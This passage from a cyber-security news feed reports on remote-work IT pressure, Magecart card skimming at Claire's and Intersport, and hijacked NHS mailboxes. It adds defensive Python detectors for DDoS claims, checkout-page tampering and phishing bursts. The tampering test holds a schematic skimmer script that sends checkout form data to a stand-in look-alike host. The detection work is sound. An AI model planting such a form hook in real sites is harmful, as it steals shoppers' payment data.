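# aggregate traffic at one exchange point, and the error rate observed on
# requests to the services claimed to be under attack.
BASELINE_IXP_GBPS = [100, 102, 98, 101, 99, 100, 103, 97, 100, 101]
BASELINE_ERROR_RATE = [0.010, 0.011, 0.009, 0.010, 0.012, 0.010, 0.009, 0.011, 0.010, 0.010]


def zscore(series, window):
    """How many baseline standard deviations the latest reading sits above
    the mean of the preceding `window` readings."""
    if len(series) <= window:
        raise ValueError("need more than `window` readings")
    base = series[-window - 1:-1]
    mu, sigma = mean(base), pstdev(base)
    if sigma == 0:
        return 0.0 if series[-1] == mu else float("inf")
    return (series[-1] - mu) / sigma


def triage(ixp_gbps, error_rate, window=10, spike_z=3.0, error_spike_z=3.0):
    """Thresholds are assumptions for this example. A volumetric attack should
    move exchange-point traffic far outside its baseline; a routing or
    configuration failure typically does not, even while users are down."""
    traffic_z = zscore(ixp_gbps, window)
    error_z = zscore(error_rate, window)
    if traffic_z >= spike_z:
        return "volumetric-ddos-likely"
    if error_z >= error_spike_z:
        # Errors up without a traffic spike: application-layer attack or an
        # internal failure, but not the "global DDoS" that was being claimed.
        return "degraded-without-traffic-spike"
    return "no-ddos-signal"


if __name__ == "__main__":
    # The T-Mobile-style case: customers down, but the exchange points and the
    # error rate toward the supposedly attacked services look normal.
    print(triage(BASELINE_IXP_GBPS + [101], BASELINE_ERROR_RATE + [0.011]))
    # What an actual volumetric attack would look like from the same vantage.
    print(triage(BASELINE_IXP_GBPS + [400], BASELINE_ERROR_RATE + [0.011]))
```

The check is deliberately taken from a vantage point outside the affected carrier; a DDoS claim that rests only on the victim's own outage page, with no corroborating change at the exchanges, is exactly the pattern this incident showed.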

Categories: Cyber Risk News

IT Pros Feel #COVID19 Pressure as 66% Cite Increased Security Risks

Tue, 06/16/2020 - 10:20

IT professionals have been placed under extreme pressure to support mass home working over the past few months, with two-thirds reporting an increase in security issues, according to Ivanti.

The endpoint security firm polled 1600 global IT professionals to better understand their changing workload during recent government-mandated lockdowns.

Of those who cited security challenges, malicious emails (58%), non-compliant employee behavior (45%) and an increase in software vulnerabilities (31%) came out top.

Yet the bigger picture is that IT teams have been stretched on an almost unprecedented scale due to the demands of a newly distributed workforce.

For 63% of those interviewed, IT workloads increased 37% since remote working began. The most common requests include VPN issues (74%), video conferencing (56%), bandwidth constraints (48%), password resets (47%) and messaging issues (47%).

Specifically, they have been forced to do things like increase VPN access to more employees (70%), source, set up and distribute extra devices (54%) and create more “how to” articles for staff (52%).

Against this backdrop, a lack of communication was cited as a top challenge by 20% of respondents.

This extra workload is somewhat understandable, given that respondents have seen a 93% increase on average in remote workers. More than a third of respondents said 100% of employees are now working from outside the office.

“Responding to the COVID-19 pandemic has indeed placed an unprecedented demand on IT teams as they work to balance security and user productivity for the new remote workforce,” said Phil Richards, chief security officer at Ivanti.

“It’s a shift we see first-hand at Ivanti. To ease the new IT workload, we found that by employing more IT service automation and asset management optimization our IT staff are better equipped to support users’ needs, while also taking necessary actions to mitigate security risk. As a result, we are able to ensure employees can remain both productive and safe.”

Despite the extra lockdown-related workload, IT professionals pointed to the lack of a commute (44%) and more flexible working hours (19%) as benefits, and 16% said they have been more productive.

Categories: Cyber Risk News

Magecart Attackers Target Retail Brands Under Lockdown

Tue, 06/16/2020 - 09:20

Magecart attackers have been busy again, installing digital skimming code onto the websites of several popular retailers over recent weeks.

The first brand affected was US accessories provider Claire’s. Security company Sansec spotted an unknown third party registering the “claires-assets” domain back in March, just after the chain decided to shut all of its stores.

“For the next four weeks, Sansec did not observe suspicious activity, but in the last week of April, malicious code was added to the online stores of Claire’s and its sister brand Icing,” it continued.

“The injected code would intercept any customer information that was entered during checkout, and send it to the server. The malware was present until June 13.”

Unlike many Magecart efforts, which compromise sites by attacking their digital supply chain partners, this was a direct attack in which the hackers gained write access to the sites’ code.

However, the root cause of the compromise is not yet known: Sansec hypothesized that leaked admin credentials, spear-phishing of staff and/or a compromised internal network may have been to blame.

The retailer responded quickly to Sansec’s private disclosure of the incident, and urged online shoppers to monitor their bank statements.

“Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process,” it said in a statement sent to Sansec.

“We removed that code and have taken additional measures to reinforce the security of our platform. We are working diligently to determine the transactions that were involved so that we can notify those individuals. Cards used in our retail stores were not affected by this issue.”

Also on Monday, security firm ESET warned that online shoppers in the Balkans may have had their card details stolen from Intersport stores. It claimed that the popular sports retailer fixed the issue “within several hours” after the firm sounded the alarm. Consumers in Croatia, Serbia, Slovenia, Montenegro and Bosnia and Herzegovina were affected.
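Both the Claire's and the Intersport compromises above come down to the same change on a checkout page: an extra script appears, either loaded from a new host (here a look-alike of the shop's own domain, in the spirit of the "claires-assets" registration) or injected inline, and it forwards what the customer types. An inventory diff of the page's scripts is the check that would have surfaced it. This is an added example, not Sansec's or ESET's tooling; the two HTML documents, the host names and the `exfil` call inside the injected script are constructed, and the injected script is schematic rather than a working skimmer.

```python
"""Script-inventory diff for a checkout page: new external hosts and new or
changed inline scripts relative to a known-good baseline."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed known-good page (not a real shop).
BASELINE_HTML = """<html><head>
<script src="https://www.example-shop.test/js/app.js"></script>
<script>window.shopConfig = {currency: "USD"};</script>
</head><body><form id="checkout"></form></body></html>"""

# The same page after an injection: a loader on a look-alike host plus an
# inline hook on the checkout form. Schematic only; `exfil` is a placeholder.
SKIMMED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script src="https://example-shop-assets.test/js/analytics.js"></script>\n'
    "<script>document.getElementById('checkout').addEventListener('submit', "
    "function (e) { exfil('https://example-shop-assets.test/c', e.target); });</script>\n"
    "</head>",
)


class ScriptCollector(HTMLParser):
    """Collects external script hosts and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(urlparse(src).netloc.lower())
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.add(hashlib.sha256(body.encode()).hexdigest())


def inventory(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def is_first_party(host, first_party):
    return host == first_party or host.endswith("." + first_party)


def diff_scripts(baseline_html, current_html, first_party):
    """Anything new here is a change that nobody deployed on purpose."""
    base_ext, base_inl = inventory(baseline_html)
    cur_ext, cur_inl = inventory(current_html)
    return {
        "new_third_party_hosts": sorted(
            h for h in cur_ext - base_ext if not is_first_party(h, first_party)),
        "new_inline_scripts": len(cur_inl - base_inl),
        "removed_inline_scripts": len(base_inl - cur_inl),
    }


if __name__ == "__main__":
    print(diff_scripts(BASELINE_HTML, SKIMMED_HTML, "example-shop.test"))
```

Run against the rendered checkout page on a schedule and alert on any non-empty result; a `Content-Security-Policy` `script-src` allowlist is the complementary control that stops the injected loader from executing at all, but the diff still tells you the page was tampered with.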

Worryingly for the brands affected, research from SiteLock late last year found that a third of consumers never again shop with a retailer their information is stolen from.

Categories: Cyber Risk News

NHS: 100+ Email Accounts Hijacked in Phishing Campaign

Tue, 06/16/2020 - 08:25

The NHS has confirmed that 113 internal email accounts were compromised and used to send malicious spam outside the health service around two weeks ago.

A brief NHS Digital statement issued on Friday revealed that the incident occurred between Saturday May 30 and Monday June 1 2020.

It claimed the security snafu affected a “very small proportion” of NHS email accounts, around 0.008% of the 1.4 million total, and was linked to a wider campaign designed to steal victims’ log-ins.

“There is currently no evidence to suggest that patient records have been accessed. We are working closely with the National Cyber Security Centre (NCSC), who are investigating a widespread phishing campaign against a broad range of organizations across the UK,” it added.

In fact, the NCSC first raised the alarm about the campaign back in October last year, claiming that automated attacks designed to harvest credentials had been active since at least July 2018 and were spreading “indiscriminately” across multiple verticals.

“In this campaign, the user receives a phishing email from a legitimate and known email account which has been compromised. Phishing emails were previously sent from contacts in recent email communications with the recipient, and the subject lines often mirrored the most recent email exchange. This created an initial plausibility for the user to trust the email,” it explained.

“More recently, the subject lines include the compromised user’s address-book entry for the recipient of the phishing email. This could be in the recipient’s name, the email address or may just be blank.”

Clicking on a link in the email would take the user to a fake log-in page featuring their organization’s logo and their email, the NCSC said.
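The behaviour the NCSC describes leaves a usable trace in outbound mail logs: a single internal mailbox suddenly mails many of its recent contacts in a short burst, with subject lines that are either bare reply threads, blank, or just the recipient's own address-book entry. The detection below is an added example, not NHS Digital's or the NCSC's tooling; the log lines, their format, the internal domain and the window and threshold values are all constructed assumptions.

```python
"""Flag a hijacked internal mailbox from an outbound burst in mail logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in an assumed format:
#   <ISO time> <sender> -> <recipient> | <subject>
LOG = """\
2020-05-30T09:01:00 alice@nhs.example -> bob@nhs.example | Re: rota for June
2020-05-30T09:03:00 alice@nhs.example -> gp.partner@clinic.example | Re: referral
2020-05-30T11:40:00 compromised.user@nhs.example -> c1@supplier.example | Re: invoice 4411
2020-05-30T11:40:05 compromised.user@nhs.example -> c2@council.example | Re: meeting notes
2020-05-30T11:40:09 compromised.user@nhs.example -> c3@charity.example |
2020-05-30T11:40:14 compromised.user@nhs.example -> c4@pharma.example | Dr Smith
2020-05-30T11:40:20 compromised.user@nhs.example -> c5@uni.example | Re: minutes
2020-05-30T11:40:25 compromised.user@nhs.example -> c6@uni.example | c6@uni.example
2020-05-30T14:00:00 carol@nhs.example -> dan@nhs.example | lunch?
"""


def parse(log_text):
    """Returns (timestamp, sender, recipient, subject) tuples."""
    events = []
    for line in log_text.strip().splitlines():
        ts, rest = line.split(" ", 1)
        sender, _, rest = rest.partition(" -> ")
        recipient, _, subject = rest.partition(" |")
        events.append((datetime.fromisoformat(ts), sender, recipient, subject.strip()))
    return events


def flag_bursts(events, internal_domain, window=timedelta(minutes=5), max_external=4):
    """Internal senders that reach more than `max_external` distinct external
    recipients inside any `window`-long span. Also counts how many of those
    messages carry the weak subjects the NCSC describes: blank, or equal to
    the recipient's address (a name from the address book cannot be checked
    without that address book, so it is not attempted here)."""
    by_sender = defaultdict(list)
    for ts, sender, rcpt, subj in sorted(events):
        if sender.endswith("@" + internal_domain) and not rcpt.endswith("@" + internal_domain):
            by_sender[sender].append((ts, rcpt, subj))
    flagged = {}
    for sender, msgs in by_sender.items():
        for i, (t0, _, _) in enumerate(msgs):
            span = [m for m in msgs[i:] if m[0] - t0 <= window]
            recipients = {m[1] for m in span}
            if len(recipients) > max_external:
                weak = sum(1 for m in span if m[2] == "" or m[2] == m[1])
                flagged[sender] = {"distinct_external": len(recipients), "weak_subjects": weak}
                break
    return flagged


if __name__ == "__main__":
    print(flag_bursts(parse(LOG), "nhs.example"))
```

The threshold is the tuning knob: set it from a few weeks of each mailbox's normal fan-out rather than one global number, and feed a hit straight into the password reset and session revocation that NHS Digital describes applying to the affected accounts.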

All those affected by the latest NHS-based attacks will have been notified by today, NHS Digital claimed. It argued that since implementing a “new password approach” there has actually been a 94% decrease in phishing emails sent to NHSmail accounts over the past year.

“We are investigating this issue and have taken the precaution of asking all mailboxes that have a similar configuration to the compromised accounts to change their passwords with immediate effect,” NHS Digital concluded.

“We have worked with the organizations involved to isolate affected accounts, supported them to make any necessary changes and have advised affected individuals.”

Categories: Cyber Risk News